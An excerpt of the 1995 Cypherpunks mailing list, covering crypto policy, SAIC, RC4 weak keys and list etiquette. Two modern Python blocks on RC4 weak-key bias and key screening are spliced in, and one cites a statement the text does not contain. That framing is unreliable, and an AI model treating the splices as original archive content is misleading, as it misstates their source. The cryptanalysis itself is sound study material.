        for ($x=0;$x<600000;$x++){};
    }
}
============================================================

From tcmay at got.net Fri Sep 29 19:06:45 1995
From: tcmay at got.net (Timothy C. May)
Date: Fri, 29 Sep 95 19:06:45 PDT
Subject: Yet Another "(Fwd) Internet Euro-Clipper"
Message-ID:

At 5:12 PM 9/29/95, Peter Trei wrote:
>------- Forwarded Message Follows -------
>Date: 20 Sep 1995 12:24:10 GMT
>From: rja14 at cl.cam.ac.uk (Ross Anderson)
>Subject: European Governments Agree to Ban Strong Crypto
...

The biggest problem I have with this is that this is the third, fourth, or fifth posting of Ross Anderson's piece to this list (maybe I'm counting one or more posts to Cyberia-l). (And others commented on the "Europeans to ban strong crypto" theme about a week ago.)

I urge people to read what's on the list and not repost things which have already appeared. If they don't have time to read all of the messages on the list, which is understandable, then they need to be even more careful in posting things. Not to pick on Peter Trei, as this happens all the time, whenever a hot issue appears. With 1000 people on the list, repeated postings and cross-posting spams are getting out of hand.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
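The RC4 weak-key property referred to in the RSADSI statement above is Andrew Roos's 1995 observation: when the first two key bytes sum to zero mod 256, the first keystream byte equals the third key byte plus 3 roughly 13.8% of the time instead of 1/256, so a known first plaintext byte leaks key material. The Python below is an added illustration, not code from RSADSI or from anyone on the list; it implements RC4, measures the bias over random weak keys, and then shows two system-level countermeasures of the kind the statement alludes to without naming: deriving the actual RC4 key through a hash (SHA-1 is assumed here) and discarding the initial keystream output.

```python
"""RC4 (KSA + PRGA), the Roos weak-key class, and two mitigations.

Added illustration for the RSADSI statement on RC4 weak keys; not code from
RSADSI or from the list. Key derivation via SHA-1 is an assumption made here.
"""
import hashlib
import random


def rc4_keystream(key: bytes, n: int, drop: int = 0) -> bytes:
    """Return n RC4 keystream bytes for key, after discarding the first
    `drop` output bytes (drop=0 is plain RC4)."""
    if not 1 <= len(key) <= 256:
        raise ValueError("RC4 key must be 1..256 bytes")
    # Key-scheduling algorithm: permute S under control of the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm.
    out = bytearray()
    i = j = 0
    for _ in range(drop + n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out[drop:])


def is_roos_weak_key(key: bytes) -> bool:
    """Roos's class: K[0] + K[1] == 0 (mod 256). For such keys the KSA leaves
    S[1] == 1 and S[2] == K[2] + 3 with probability about (254/256)^253, so
    the first PRGA output is K[2] + 3 around 13.8% of the time."""
    return len(key) >= 3 and (key[0] + key[1]) & 0xFF == 0


def predicted_first_byte(key: bytes) -> int:
    """The keystream byte Roos's analysis predicts for a weak key."""
    return (key[2] + 3) & 0xFF


def derive_key(key: bytes) -> bytes:
    """Mitigation 1 (assumed here, not RSADSI's documented advice): hash the
    user key so that structure in K[0..2] never reaches the KSA."""
    return hashlib.sha1(key).digest()


def weak_key_hit_rate(n_keys: int, key_len: int = 16, seed: int = 1,
                      transform=None, drop: int = 0) -> float:
    """Fraction of random Roos-weak keys whose first emitted keystream byte
    equals predicted_first_byte(key).  `transform` maps the user key to the
    key actually fed to RC4; `drop` discards leading keystream bytes
    (mitigation 2).  Keys are constructed from a seeded PRNG."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(n_keys):
        k = bytearray(rng.randrange(256) for _ in range(key_len))
        k[1] = (-k[0]) & 0xFF          # force K[0] + K[1] == 0 mod 256
        k = bytes(k)
        assert is_roos_weak_key(k)
        effective = transform(k) if transform else k
        if rc4_keystream(effective, 1, drop)[0] == predicted_first_byte(k):
            hits += 1
    return hits / n_keys


if __name__ == "__main__":
    print("raw RC4, weak keys   :", weak_key_hit_rate(2000))
    print("hashed key           :", weak_key_hit_rate(2000, transform=derive_key))
    print("drop first 256 bytes :", weak_key_hit_rate(2000, drop=256))
```

The first figure lands near 0.14 while the other two sit near the chance level of 1/256, which is the whole point of the "sound advice on the design of the overall cryptographic system" the statement mentions.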
From anonymous at freezone.remailer Fri Sep 29 19:12:51 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 29 Sep 95 19:12:51 PDT
Subject: SAIC bought InterNic, but who is SAIC? A spook contractor!
Message-ID: <199509300212.WAA29555@light.lightlink.com>

URL: http://www.saic.com/corporate/history/25.html

*** About SAIC ***
_________________________________________________________________

"SAIC 25 YEARS OF PROGRESS"

Founded by a small group of San Diego scientists in 1969, Science Applications International Corporation (SAIC) now ranks as the nation's largest employee-owned high-tech company. With annual revenues of $1.6 billion, SAIC has almost 4,000 employees in San Diego, and about 16,000 employees at more than 250 locations worldwide. SAIC offers broad expertise in technology development and analysis, computer system development and integration, technical support services, and computer hardware and software products. SAIC scientists and engineers work to solve complex technical problems in business areas that include environment, energy, health, transportation and space.

Since the beginning, SAIC has been committed to making significant contributions to nationally important programs. Over the past two decades, SAIC technical staff have contributed to clean-up efforts at Three Mile Island and Prince William Sound, to the success of Operation Desert Storm, and to space missions ranging from Voyager to the shuttle flights. The company is helping develop new technology to clean up hazardous waste at Superfund sites, while other scientists are studying global climate and oceanographic changes. In another critical area, SAIC is increasing the quality of patient care while lowering costs by developing an automated patient record system for Department of Defense medical facilities.

Today, SAIC generates about 90 percent of its business through federal government contracts, half of which are in the national security area.
The company has been transitioning its extensive experience in advanced defense systems and software engineering to benefit civilian programs. For example, SAIC networking capability helps dozens of government agencies share information to fight drug smuggling, and integrates technology that has put a pollution-free bus on the road.

Bob Beyster, SAIC's founder and chief executive officer, credits the success of the company to its employee ownership. "The hallmark of SAIC through the years has been the principle that those who contribute to the company should own it, with that ownership proportional to their contribution and performance as much as possible," Beyster says, "SAIC was designed for professional people who want to do superior scientific and technical work, who want to have a stake and a voice in the company's development and direction, and who expect fair rewards for doing excellent work."
_________________________________________________________________
Copyright SAIC
_________________________________________________________________
Last updated on 07-05-95

----------

URL: http://www.itps.saic.com/websites.htm

Other SAIC Web Sites:
_________________________________________________________________
Foundation for Enterprise Development
SAIC Advanced Technology and Analysis Sector
SAIC Aeronautical Systems Operation
SAIC Applied Physics Operation
SAIC ASDI (SEE Program)
SAIC Asset C3I Group
SAIC Hampton's Information System
SAIC HTTP Server Site
SAIC Idaho Falls ID
SAIC Ideas Group
SAIC Information and Simulation Sciences
SAIC Information Technology Group
SAIC Information Technology Lab
SAIC JSTARS MOT&E Office
SAIC @ Langley Research Center
SAIC Los Altos
SAIC Medical Imaging
SAIC @ New Mexico
SAIC Open Systems Lab
SAIC Security Web Site
SAIC Space Sciences
SAIC Sterling Heights, Michigan
SAIC System Development Operation Center
SAIC Systems Engineering
SAIC Technology Solution Sector
SAIC Telecommunications Information Engineering Organization
SAIC
Test and Evaluation Group
SAICnet Gopher
_________________________________________________________________
SAIC-Hosted/Created Sites:
Smart Site
City of Ridgecrest Homepage

From dan at milliways.org Fri Sep 29 19:15:12 1995
From: dan at milliways.org (Dan Bailey)
Date: Fri, 29 Sep 95 19:15:12 PDT
Subject: ESM under ULTRIX?
Message-ID: <199509300215.AA06751@ibm.net>

I'm having some trouble getting ESM to work under DEC Ultrix. Has anyone gotten this to work? My first problem was that Ultrix doesn't understand one of the constants passed to an ioctl. With the help of a Linux box, I got the value of the constant and plugged it in. Now ESM compiles, says randomizing........, then does a carriage return and just dies. Ctrl-C doesn't work, Ctrl-Z doesn't work. Further I know that it's dying somewhere before the ioctl. Anyone know how to make this work?

For reference,
> uname -a
ULTRIX bigwpi.WPI.EDU 4.5 0 RISC
>

Dan
***************************************************************
#define private public
dan at milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************

From anonymous at freezone.remailer Fri Sep 29 19:22:04 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Fri, 29 Sep 95 19:22:04 PDT
Subject: SAIC bought InterNic, but who is SAIC? A spook contractor!
Message-ID: <199509300221.WAA00326@light.lightlink.com>

URL: http://opentext.uunet.ca:8080/omw/simplesearch

The Open Text Index found 199 pages containing: Science Applications International Corporation.

From jervin at netpath.net Fri Sep 29 20:13:48 1995
From: jervin at netpath.net (John D. Ervin)
Date: Fri, 29 Sep 95 20:13:48 PDT
Subject: Export/import of chips
Message-ID: <199509300315.XAA01062@server1.netpath.net>

I deal with Importers from Taiwan, Hong Kong, Korea, and China on a daily basis. Because the deals I get on components are very good...
They are name brand and meet FCC Standards when assembled as systems, but when imported as components they are generally worthless, until assembled. How is import or export of Encryption related components monitored ?? Microprocessors can be imported and exported, as can boards.. As Junk.... Nobody Checks these shipments ?? Now if some of those boards did encryption/decryption, and they were paired with a processor, They could do some damage.. But when imported and exported as components (ie Electronic Junk) who is to tell what the end usage is really for ?? This is how a Toyota, Datsun, Subaru, etc are really American built and are American Cars.....

-------------------------------------------------
jervin at netpath.net
-------------------------------------------------

From karlton at netscape.com Fri Sep 29 21:07:23 1995
From: karlton at netscape.com (karlton)
Date: Fri, 29 Sep 95 21:07:23 PDT
Subject: Netscape hole without .Xauthority (fwd)
In-Reply-To:
Message-ID: <306CC278.4AF@netscape.com>

If your X server is not secure, then your pass phrases are not secure.
If your pass phrases are not secure then private keys are compromised.
If your private keys are compromised ...

She swallowed a fly! Perhaps, she'll die.

PK
--
Philip L. Karlton karlton at netscape.com
Principal Curmudgeon http://www.netscape.com/people/karlton
Netscape Communications Corporation

From karlton at netscape.com Fri Sep 29 21:21:33 1995
From: karlton at netscape.com (karlton)
Date: Fri, 29 Sep 95 21:21:33 PDT
Subject: Netscape "random" number seed generator code available
In-Reply-To: <9508298123.AA812398949@cc2.dttus.com>
Message-ID: <306CC5CC.6A7E@netscape.com>

I will mail the relevant files to Mr. Diehl.

PK
--
Philip L.
Karlton karlton at netscape.com
Principal Curmudgeon http://www.netscape.com/people/karlton
Netscape Communications Corporation

From adam at homeport.org Fri Sep 29 21:40:21 1995
From: adam at homeport.org (Adam Shostack)
Date: Fri, 29 Sep 95 21:40:21 PDT
Subject: Hack Microsoft
In-Reply-To: <199509291635.JAA06820@infinity.c2.org>
Message-ID: <199509300443.AAA28911@homeport.org>

Perry writes:
> That's almost an invitation to hack Microsoft's web products, isn't it?
>
> (Anyone from Netscape care to join in the fun?)
>
> Perry

While this might be read as a sarcastic comment, I'll suggest that it really is excellent advice from Perry. Like cryptosystem design, secure software is best written by those with experience breaking other people's systems. Encouraging Netscape programmers to hack at SST will result in embarrassing disclosures for Microsoft, and better code for Netscape.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From anonymous-remailer at shell.portal.com Fri Sep 29 21:43:26 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 29 Sep 95 21:43:26 PDT
Subject: Murdering Electronic junk mailers *should* be legal. Nuking thei
Message-ID: <199509300442.VAA28026@jobe.shell.portal.com>

On 29 Sep 95 at 16:54, Syed Yusuf wrote:
> I just received an electronic junkmail!
> not only that but it was racist (and/or republican) in content.
!!
> Nothing? NOTHING??????
> Cypher punks to the rescue? my privacy has been violated anyone got
> any ideas besides just putting each individual into my kill file?

The return address was forged, I emailed the header chain's first smtp server admin to see if they can help. If I find the guy, his provider will nuke him or they are toast. Period!
> --
> Syed Yusuf | http://www.uidaho.edu/~yusuf921
> Keep me away from Wisdom that does not Cry, Philosophy that does not
> Laugh, and Greatness that does not bow before Children
> --Kalil Gibran
>

From ChristopherA at consensus.com Fri Sep 29 22:26:13 1995
From: ChristopherA at consensus.com (Christopher Allen)
Date: Fri, 29 Sep 95 22:26:13 PDT
Subject: X.509, S/MIME, and evolution of PGP
Message-ID:

At 3:22 PM 9/27/95, Bill Stewart wrote:
>2) RSA patent - can this be built with RSAREF? Or RSAREF with permission
>for a couple extra activities? Or built out of RIPEM or RIPEM-SIG?
>The latter has the benefit of already being exportable.

It certainly can be built from RSAREF, as I use my Apple DigiSign X.509 key (ultimately created with TIPEM in the Mac system software) with RIPEM/Mac (which uses RSAREF.)

Some additional info: my company, Consensus Development, has commercial rights to license RSAREF to developers, and also has a good relationship with VeriSign. We are helping them write a variety of tools to make issuing X.509 certs easier.

>5) S/MIME - real S/MIME compliance requires support for RC2 as well as
>publicly available algorithms, though this is really just an X.509 handler.

I've been working on getting RC2/RC4 in object-only exportable size key form from RSA for RSAREF customers, and Jim Bidzos has agreed in principle. We have to work out details, however.

>6) It's a lot of work - well, yeah, it is. And I'm lazy. Is there enough
>related code in SSLeay to steal to help implement it?

I spoke with Eric yesterday and I think he was working on some ASN.1 related classes for a future version of SSLeay.

------------------------------------------------------------------------
..Christopher Allen                 Consensus Development Corporation..
..                                       1563 Solano Avenue #355..
..                                      Berkeley, CA 94707-2116..
..                                   o510/559-1500 f510/559-1505..
From moose at cm.org Fri Sep 29 23:41:46 1995
From: moose at cm.org (Cancelmoose[tm])
Date: Fri, 29 Sep 95 23:41:46 PDT
Subject: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <199509162353.RAA06965@nagina.cs.colorado.edu>
Message-ID: <19950930064113.AXK11529@cm.org>

> > Several people are working on improvements to netnews which allow more active
> filtering. The most promising techniques that I have heard about involve a
> lot of "ratings" being generated by readers and then taken into account by
> other readers when filtering/sorting the articles. <
> I don't know if the technology is there yet, or if it is accessible to most
> of our readers. One person who is working on such a scheme is "(cm)", or
> "na48985 at anon.penet.fi". I have added his name to the Cc: line so perhaps he
> would be so kind as to tell us about his "NoCeM" ("No see 'em!") software.

(Please note the new email address-- moose at cm.org).

I apologize for the delay in responding to your message -- I will be putting a lot of information about NoCeM up on http://www.cm.org in the next day or so. You can also find information in the newsgroup alt.nocem.misc (if you get it). If these don't work for you, feel free to write to me, and I'd be happy to send you whatever you need.

(cm)
=-=-=-=-=
Please note new address: moose at cm.org

From jirib at sweeney.cs.monash.edu.au Fri Sep 29 23:44:19 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Fri, 29 Sep 95 23:44:19 PDT
Subject: Electronic junk mail
In-Reply-To:
Message-ID: <199509300642.QAA28042@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello Syed Yusuf and cypherpunks at toad.com

S.Y. wrote:
> I just received an electronic junkmail!
...
> : ...
> > there is _nothing_ you can do to keep unwanted mail out of your mailbox,
> ^^^^^^^^^!!!!
> Nothing? NOTHING??????
...

You could only accept signed e-mail. From a suitably defined set of signators, of course.
If you write a script to do that for you, it would be useful to others as well: parents could set it up for their innocent children to guard them against all them bad guys on the net of which there are exactly 98.3527% (no, that's not from [Rimm 95], I made it up).

The other thing would be that you would thereby force all your correspondents to use PGP, which can't be such a bad thing, can it.

Yes, no, maybe?

Jiri
- --
If you want an answer, please mail to . On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGzmoSxV6mvvBgf5AQFRXQQAzP2Zv6reuIVyq9TdofXq5wJCz5aLdXou
yexGtkXSo8HKcHEmtF1DpcTZuzNs0zuXD92G3VAI+nCncAzfKKsLziSZ5hd93Dnm
huTC+wLm6XrnrjwS56h8F843bBE2jrEL1rnBN9UhEUD9VOyA1ncj7rb8Nap9Z0/V
885XUrREQTM=
=pOSV
-----END PGP SIGNATURE-----

From jamesd at echeque.com Fri Sep 29 23:58:27 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 29 Sep 95 23:58:27 PDT
Subject:
Message-ID: <199509300658.XAA03050@blob.best.net>

In addition to being totally off topic and spamming lots of lists, Terra Libra is selling Ponzi schemes and pyramid schemes. This is just "make money fast" elaborately dressed in libertarian rhetoric.

At 07:11 AM 9/28/95 +0100, Anonymous wrote:
> This is the best description of debt currency I've seen. Debt currency
>is today's most effective form of slavery. It is today's American slavery.
>
> The text is from the book:
>
> THE ECONOMIC RAPE OF AMERICA
> WHAT YOU CAN DO ABOUT IT
>
>by Frederick Mann of Terra Libra
>
>The book costs $19.95 plus $2 postage and handling.
>It can be ordered from:
>
>Terra Libra
>2430 E. Roosevelt #998
>Phoenix, Az 85008
>

 ---------------------------------------------------------------------
|We have the right to defend ourselves    |   http://www.jim.com/jamesd/
|and our property, because of the kind    |
|of animals that we are. True law         |   James A. Donald
|derives from this right, not from the    |
|arbitrary power of the state.            |   jamesd at echeque.com

From jirib at sweeney.cs.monash.edu.au Sat Sep 30 00:27:15 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Sat, 30 Sep 95 00:27:15 PDT
Subject: Cypherpunks Press release
In-Reply-To:
Message-ID: <199509300726.RAA28172@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks at toad.com and tcmay at got.net (Timothy C. May)

tcmay at got.net (Timothy C. May) wrote:
> I guess you all know how much I hate this "who will be our spokesman?"
...

It seems to me that there are two viewpoints,
* a spokesman would be useful, and
* a spokesman cannot be appointed due to lack of org
Which both seem to be true to me (they are *not* contradictory, only the consequences are).

How about this idea: I remember once seeing some piece on some TV personality (sorry, don't remember who, long time ago) who was interviewed by fax. The journalist sent questions to him, and some time later received answers.

All that is needed then is someone with a fax machine to volunteer to receive the fax, type it in and summarise the response afterwards (noting points on which there was disagreement, and who disagreed in what way).

...
> I've turned down several recent chances for interviews, for these reasons:
>
> 1. I feel the people doing the work should be interviewed, not just someone
> who has some visibility (whatever mine might be). If PGP is the issue, then
...

Except PGP skill doesn't equal PR skill, not to mention that there might be a geographical, time-zone or language barrier. Sometimes having a separate PR person is useful, even if it does tend to lead to the moronic statements salesdroids are infamous for. With care, this problem can be minimized.

...
> 2. Location, location, location! The media foci are Washington, New York,
> and San Francisco, at least for our area of interest. Occasional forays
> into Austin, Miami, L.A., etc.
> This is where the taped interviews are done.
...

Not all PGP is done in those areas. You might want to have a SpokesPunk near a focus to avoid having to get the people who actually do the work to one of the abovementioned foci.

...
> The point? These "journalists" are tuned to looking for catchy quotes, all
...

It's in our interest to give them such catchy quotes, no? Unless it would destroy us, of course...

...
> With no organization, no office, no coordination, we cannot "feed the media
> machine" the way it expects to be fed.

Only problem is, does anyone know of any other way to get our ideas to be accepted by Joe Sixpack?

...
> Far better that journalists like Steven Levy and John Markoff subscribe to
> the list, or to condensations by people like Eric Blossom, and then deal
...

But then wouldn't that journalist act as a SpokesPunk? Would you support such a journalist writing about Cypherpunks? What is the essential difference between a journalist writing an article and a volunteer writing a press release?

> Anarchy is part of our charm. More importantly, part of our theme.
...

A well-written press release could reflect that. For example, some points could be presented in two ways (perhaps even contradictory) with full attribution of who wrote which view. Those who oppose the whole idea could be noted in the press release :-) Unless they object to that in which case they wouldn't be.

Yes, No, Maybe? Definite Maybe?

Jiri
- --
If you want an answer, please mail to . On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGzxJCxV6mvvBgf5AQF1owP9GwgbLK1/HCq+iRKqw42q5Y6Kzbtmyda1
YJwblubOWacbVER2aURAN3m51MCsTXreuLxSbcm9dgP4Zk2071yZFGa7D2OF7dtS
pkfa5k1pn2v1EYplTvgJhAdTVJGqJ3sPc1VCIIWaRazeJjS0zA4d9rHmJWXb5DXp
6Hz8CbDw4UA=
=th3o
-----END PGP SIGNATURE-----

From stewarts at ix.netcom.com Sat Sep 30 01:28:33 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 30 Sep 95 01:28:33 PDT
Subject: X.509, S/MIME, and evolution of PGP
Message-ID: <199509300828.BAA00347@ix.ix.netcom.com>

At 10:29 PM 9/29/95 -0700, Christopher Allen wrote:
>At 3:22 PM 9/27/95, Bill Stewart wrote:
>>5) S/MIME - real S/MIME compliance requires support for RC2 as well as
>>publicly available algorithms, though this is really just an X.509 handler.
>I've been working on getting RC2/RC4 in object-only exportable size key
>form from RSA for RSAREF customers, and Jim Bidzos has agreed in principle.
>We have to work out details, however.

Sounds good, but having publicly implementable standards would be nicer; licensable patented code is enough of a hassle, without having standards that have *trade secrets* built into them. RC2 as an option is fine; RC2 as a mandatory part of a conforming implementation is pretty tacky.

>>6) It's a lot of work - well, yeah, it is. And I'm lazy. Is there enough
>>related code in SSLeay to steal to help implement it?

Actually, it turns out that the latest RIPEM has certificate chains, Web of Trust, and really just about everything I want, except perhaps user-friendly GUIs, which could be added easily enough. I haven't yet sorted out which parts are in the export-approved RIPEM-SIG and which parts are only in RIPEM2.1, but it's a pretty straightforward job. (Now to go scrounge some disk space!)

The RIPEM code is all public-domain, and uses RSAREF for its crypto, so exporting the non-RSAREF parts is copyright/patent clean, and maybe it can be possible to put together a CJ-able version of the new stuff so it can gain legitimacy after having been exported for months :-)

#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From bdavis at dg.thepoint.net Sat Sep 30 02:32:26 1995
From: bdavis at dg.thepoint.net (Brian Davis)
Date: Sat, 30 Sep 95 02:32:26 PDT
Subject: [revcoal@pcnet.com: Re: The owls are not what they seem]
In-Reply-To: <9509151740.AA06675@veronica.EBT.COM>
Message-ID:

On Fri, 15 Sep 1995, David Taffs wrote:

>
> fyi...
>
> Date: Fri, 15 Sep 1995 00:02:33 -0400 (EDT)
> From: "Donna J. Logan"
> ...
> BTW, I'm being cagey in actually mentioning your service provider's name/
> initials, as we found that was one of the "keywords" in the filter program
> used by them and a certain national police agency (whose initials also
> trigger the filter program) to flag posts which they thought may be
> "interesting", resulting in delays of up to days in posting. Same thing
> happened in live chat in PRIVATE chat rooms, we were able to bring the
> system to a complete halt by just typing the initials of Frederico's
> Bumbling Idiots....
                                                       ^^^^^^^^^^^ ^^^^^^^^^^^^^^^

It may amuse you to know that some other federal law enforcement agencies refer to Fred's bunch as "Famous But Incompetent." But then their TV show got canceled ....

From fc at all.net Sat Sep 30 03:42:15 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Sat, 30 Sep 95 03:42:15 PDT
Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat)
In-Reply-To: <199509291716.KAA06460@ix8.ix.netcom.com>
Message-ID: <9509301040.AA02608@all.net>

...
> >The attack is based on two particularly interesting three-byte key
> >prefixes which have a high probability of producing PRNG sequences
> >which start with a known two-byte sequence. The prefixes are:
> >1. Keys starting with "00 00 FD" which have a 14% probability of
> >   generating sequences which start "00 00".
> >2. Keys starting with "03 FD FC" which have a 5% probability of
> >   generating sequences which start "FF 03".
> [much interesting work deleted]
>
> It sounds like any application using RC4 with random session keys
> should start by testing session keys and rejecting any that
> start with 00 00 or 03 FD; it means doing 2**-15 more random key
> generations, and reducing the brute-force space by 2**-15,
> but it's a pretty small reduction.

The problem is that if these keys are weak, there may be many others that are also weak. In fact, by the time we explore all of the weaknesses, we may find the system is no longer very strong at all.

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From anonymous at freezone.remailer Sat Sep 30 04:04:19 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:04:19 PDT
Subject: RTR-3 Package/Bomb Inspection System
Message-ID: <199509301104.HAA21361@light.lightlink.com>

URL: http://www.saic.com/products/rtis/rtr3.html

*** Products and Services ***
_________________________________________________________________

RTR-3 [RTR-3 Package/Bomb Inspection System]

Is a rugged one-man portable system for digital X-ray imaging in the field. The RTR-3 is a safe efficient tool for a wide range of Security applications.

o It is ideal for: Small package inspection/bomb detection; Unexploded ordnance evaluation; Point-of-entry and Customs contraband detection; Nondestructive search and evaluation.
o Quick and easy to set up, simple to operate with either battery or line voltage.
o Lightweight (under 10 pounds), compact electronic imager with 8x10 inch X-ray sensor. Images are displayed immediately after acquisition on the flat panel display.
o Portable, lightweight (25 pounds with batteries) integrated control unit with 9.5-inch flat panel image display.
o Single package portable X-ray source. Portable sources are used with either battery or line voltage.
o RTR-3 images are archived digitally and can be transmitted by modem, or floppy disk, to other computers for more detailed evaluation, and/or to assemble a database.

[RTR-3 Pipe bomb X-ray]

RTR-3 is a complete, one-man portable X-ray system capable of acquiring, enhancing, archiving, and transmitting radioscopic images in the field. The portable generator produces 20-25 very short bursts of X-rays in approximately one second during image acquisition resulting in very safe field operation. A familiar Microsoft Windows user interface permits efficient operation of the system and provides access to many image enhancement capabilities of the digital image processor. The RTR-3 features contrast stretch, zoom, pan and scroll, sharpening, smoothing, storage to hard or floppy disk, and transmission of images by modem. The RTR-3 ships in two rugged light-weight containers for maximum field portability.

For more information, comments, or questions, send email to John Reed (619) 458-3797 or to Nicholas Vagelatos (619) 458-3769, Fax (619) 458-3718.
__________________________________________________________

The right to download and store or output this information is granted to users for their personal use only. Any other reproduction, by any means mechanical or electronic, without the express written permission of Science Applications International Corp. is strictly prohibited. (C) Copyright, 1995, SAIC. All rights reserved.
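Bill Stewart's proposal in the RC4 thread above (screen session keys and reject any starting 00 00 or 03 FD) and the 14% and 5% figures quoted there, as an added example that is not code from any message in this archive: a textbook RC4, the prefix screen, and a seeded experiment that reproduces both biases. The 16-byte key length, trial count and seed are assumptions; the seeded generator is for a repeatable experiment, not for producing real keys.

```python
"""RC4 weak-key screening.  Added example, not code from any message in
this archive.  Key length, trial count and seed are assumptions; the two
key prefixes and the 14% / 5% figures come from the thread above."""
import os
import random


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Return the first n keystream bytes RC4 produces for `key`."""
    # Key-scheduling algorithm (KSA): permute S under control of the key.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA): emit keystream bytes.
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Two-byte prefixes Bill Stewart suggests rejecting.  They cover the
# "00 00 FD" and "03 FD FC" three-byte classes quoted in the thread.
WEAK_PREFIXES = (b"\x00\x00", b"\x03\xfd")


def is_weak_key(key: bytes) -> bool:
    """True if the session key starts with one of the screened prefixes."""
    return key[:2] in WEAK_PREFIXES


def generate_session_key(length: int = 16, rand=os.urandom) -> bytes:
    """Draw random keys until one passes the prefix screen.

    Each two-byte prefix is 2**-16 of the key space, so the two prefixes
    together remove 2**-15 of it and force an extra draw about once in
    32768 keys: the cost and the brute-force loss Stewart estimates.
    """
    while True:
        key = rand(length)
        if not is_weak_key(key):
            return key


def prefix_bias(prefix: bytes, expected: bytes, trials: int = 2000,
                key_len: int = 16, seed: int = 1) -> float:
    """Fraction of seeded random keys beginning with `prefix` whose
    keystream begins with `expected` (constructed sample, fixed seed so
    the experiment is repeatable; not cryptographic randomness)."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        tail = bytes(rng.getrandbits(8) for _ in range(key_len - len(prefix)))
        if rc4_keystream(prefix + tail, len(expected)) == expected:
            hits += 1
    return hits / trials


if __name__ == "__main__":
    # Expect roughly 0.14 and 0.05, as quoted in the thread; a random
    # two-byte output would match only about once in 65536 keys.
    print("00 00 FD -> 00 00:", prefix_bias(b"\x00\x00\xfd", b"\x00\x00"))
    print("03 FD FC -> FF 03:", prefix_bias(b"\x03\xfd\xfc", b"\xff\x03"))
    print("control  -> 00 00:", prefix_bias(b"\x00\x01\xfd", b"\x00\x00"))
    print("screened key:", generate_session_key().hex())
```

Cohen's caveat applies unchanged: the screen removes only the two classes known at the time, not any weak keys found later.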
__________________________________________________________
Last updated on 07-10-95

From anonymous at freezone.remailer Sat Sep 30 04:09:16 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:09:16 PDT
Subject: Computer Misuse Detection System
Message-ID: <199509301109.HAA21436@light.lightlink.com>

URL: http://www.saic.com/products/cmds/index.html

*** Products and Services ***
_________________________________________________________________

COMPUTER MISUSE DETECTION SYSTEM [CMDS]

Caught in the Act
Until now, computer misuse could not be detected until after the damage was done. With CMDS, the system alerts you to suspicious computer activity as it takes place so you can react immediately.

Round the Clock Security
CMDS never sleeps. Computer misuse characteristically takes place at times when you are not expecting it. If an intruder rattles your door knob at 2:00 AM, CMDS is there to watch the shop.

Make the Intruders Think Twice
Knowing that security software of this type is installed will give the potential misusers reason to reconsider their actions. CMDS affects the intruder's motivations by threatening them with unseen protection. Like police radar, they won't know it's there until they've been caught!

Security Through Pictures
If a picture is worth a thousand words, then CMDS speaks volumes about the security status of your network. The security trending reports show you, graphically, all the information you need to identify the intruders.

Off-the-Rack or Tailor Made
A well made suit off-the-rack can meet the needs of most people at tremendous cost savings. However, a tailor-made suit may be necessary when the person in need has special requirements. SAIC can tailor a system using CMDS core technology to meet any large heterogeneous network or detection requirements.
Increase Efficiency While Reducing Cost, Time Spent, and Losses
CMDS will increase efficiency of your security operations by performing faster than a manual review process. Your security staff will be freed up for other activities reducing your overall cost. Your losses will decrease through the deterrence and detection capabilities of CMDS.
_________________________________________________________________

More About CMDS...
o Detecting Computer Crime
o Product Description
o Designed to Detect
o Detection Capabilities
o System Requirements
o Licensing and More Information
_________________________________________________________________

Intrusion Detection Research Papers
